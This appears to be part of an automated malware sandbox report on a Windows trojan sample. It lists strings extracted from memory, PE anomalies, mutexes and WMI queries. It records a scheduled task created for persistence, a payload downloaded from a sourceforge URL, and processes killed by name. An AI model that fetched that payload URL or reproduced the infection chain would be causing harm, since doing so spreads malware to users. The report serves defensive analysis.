wfhVWWv.exe, 00000027.00000003.3332363528.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330653249.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: rsn.exe, 00000009.00000002.3351615382.000000006C6AA000.00000002.00000001.01000000.0000000A.sdmp	String found in binary or memory: http://python.org/dev/peps/pep-0263/
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingg2.crt0
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://timgolden.me.uk/python/wmi.html
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://timgolden.me.uk/python/wmi.htmlstr
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://tools.ietf.org/html/rfc6125#section-6.4.3
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: wfhVWWv.exe, 00000027.00000003.3331975685.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332126150.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332563933.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000002.3341653407.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332334490.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330409270.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330874673.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3332606735.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3330439765.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331385581.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329651053.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331356875.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331214227.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3329680868.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331943733.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331020483.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3331049064.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.faqs.org/rfcs/rfc2822.html
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.faqs.org/rfcs/rfc822.html
Source: rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344182123.0000000003077000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.opensource.org/licenses/mit-license.php
Source: rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183334442.0000000002546000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp, rsn.exe, 00000009.00000002.3351057819.000000006C452000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.html
Source: rsn.exe, 00000008.00000003.3182583813.0000000002518000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000008.00000003.3183334442.0000000002546000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3350384939.000000006C2D8000.00000002.00000001.01000000.0000000F.sdmp, rsn.exe, 00000009.00000002.3351057819.000000006C452000.00000002.00000001.01000000.0000000C.sdmp	String found in binary or memory: http://www.openssl.org/support/faq.htmlC:
Source: rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.python.org/dev/peps/pep-0205/
Source: rsn.exe, 00000008.00000003.3189558331.00000000024ED000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3349917189.000000006C1E8000.00000004.00000001.01000000.00000016.sdmp	String found in binary or memory: http://www.unicode.org/reports/tr44/tr44-4.html).
Source: rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwwsearch.sf.net/):
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://yahoo.com/
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud.google.com/appuser/docs/standard/runtimes
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cryptography.io
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cryptography.io/
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cryptography.io/en/latest/changelog/
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cryptography.io/en/latest/installation/
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cryptography.io/en/latest/security/
Source: skotes.exe, 00000006.00000002.3347261367.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fluid-draw.sourceforge.io/
Source: skotes.exe, 00000006.00000002.3347261367.0000000000A2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fluid-draw.sourceforge.io/m
Source: skotes.exe, 00000006.00000002.3347261367.0000000000A20000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000003.3155116868.0000000000AAE000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.3347261367.0000000000A68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fluid-draw.sourceforge.io/rsn.exe
Source: skotes.exe, 00000006.00000002.3347261367.0000000000A20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fluid-draw.sourceforge.io/rsn.exe8012
Source: pythoncom27.dll.8.dr	String found in binary or memory: https://github.com/mhammond/pywin32
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/issues
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/1850
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urllib3/urllib3/issues/497
Source: rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/
Source: rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3343848295.0000000002DE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/get
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://httpbin.org/post
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
Source: rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mahler:8092/site-updates.py
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://pypi.org/project/cryptography/
Source: wfhVWWv.exe, 00000027.00000003.3334367014.0000012BC3FE7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.00000000036A5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://requests.readthedocs.io
Source: rsn.exe, 00000009.00000002.3344900049.0000000003420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://twitter.com/
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp, rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
Source: rsn.exe, 00000009.00000002.3344182123.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://w3c.github.io/html/sec-forms.html#multipart-form-data
Source: wfhVWWv.exe, 00000027.00000003.3335012171.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/
Source: wfhVWWv.exe, 00000027.00000003.3335012171.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3335104515.0000012BC3FF2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
Source: rsn.exe, 00000008.00000003.3190942670.0000000000948000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3340231993.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3338665719.0000012BC3FE4000.00000004.00000020.00020000.00000000.sdmp, wfhVWWv.exe, 00000027.00000003.3339414287.0000012BC3FF1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 41678903251236549780.8.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: rsn.exe, 00000008.00000003.3208287512.0000000002483000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000025.00000003.3297710317.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, mpc.exe.37.dr, 41678903251236549780.8.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: rsn.exe, 00000009.00000002.3344900049.000000000344C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org
Source: wfhVWWv.exe, 00000027.00000003.3332933430.0000012BC3FEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.python.org/dev/peps/pep-0205/

System Summary

PE file contains section with special chars

Source: Fi3ptS6O8D.exe	Static PE information: section name:
Source: Fi3ptS6O8D.exe	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 6_2_0060CB97 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

6_2_0060CB97

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00378860	0_2_00378860
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00377049	0_2_00377049
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_003778BB	0_2_003778BB
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00448101	0_2_00448101
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_003731A8	0_2_003731A8
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00334B30	0_2_00334B30
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00447B6E	0_2_00447B6E
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00372D10	0_2_00372D10
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00334DE0	0_2_00334DE0
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_00367F36	0_2_00367F36
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: 0_2_0037779B	0_2_0037779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00638860	2_2_00638860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00637049	2_2_00637049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_006378BB	2_2_006378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_006331A8	2_2_006331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_005F4B30	2_2_005F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00632D10	2_2_00632D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_005F4DE0	2_2_005F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_00627F36	2_2_00627F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0063779B	2_2_0063779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00638860	3_2_00638860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00637049	3_2_00637049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_006378BB	3_2_006378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_006331A8	3_2_006331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_005F4B30	3_2_005F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00632D10	3_2_00632D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_005F4DE0	3_2_005F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_00627F36	3_2_00627F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0063779B	3_2_0063779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_005FE530	6_2_005FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00616192	6_2_00616192
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00638860	6_2_00638860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00688933	6_2_00688933
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_005F4B30	6_2_005F4B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00632D10	6_2_00632D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_005F4DE0	6_2_005F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00610E13	6_2_00610E13
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00637049	6_2_00637049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006331A8	6_2_006331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00611602	6_2_00611602
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0063779B	6_2_0063779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_006378BB	6_2_006378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00613DF1	6_2_00613DF1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_00627F36	6_2_00627F36
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00185050	8_2_00185050
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00185AB2	8_2_00185AB2
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00199B2E	8_2_00199B2E
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_0019ECBF	8_2_0019ECBF
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_0018BD65	8_2_0018BD65
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00187640	8_2_00187640
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00186E90	8_2_00186E90
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_00199680	8_2_00199680
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: 8_2_0018BF94	8_2_0018BF94

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe 57598406512555F6B7EC169D6627E77C8581795844CF26D3F61A3E9FB777F36A

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0060D942 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0060D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00607A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0060D64E appears 79 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 006080C0 appears 391 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00628E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0060DF80 appears 82 times
Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe	Code function: String function: 003480C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: String function: 00188570 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Code function: String function: 00181A10 appears 31 times

Source: _overlapped.pyd.39.dr

Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: _pytransform.dll.39.dr

Static PE information: Number of sections : 11 > 10

Source: Fi3ptS6O8D.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@59/1012@2/2

Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe

Code function: 8_2_001848A0 GetLastError,FormatMessageW,

8_2_001848A0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\rsn[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5348:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7024:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3500:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5984:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1029193001\rsn.exe	Mutant created: \Sessions\1\BaseNamedObjects\RandomMutex013013013
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:940:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5176:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6940:120:WilError_03

Source: C:\Users\user\Desktop\Fi3ptS6O8D.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "svdhost.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mnn.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "onn.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "u-eng.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nnu.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nvidia.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrr.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "lss.exe")
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mme.exe")

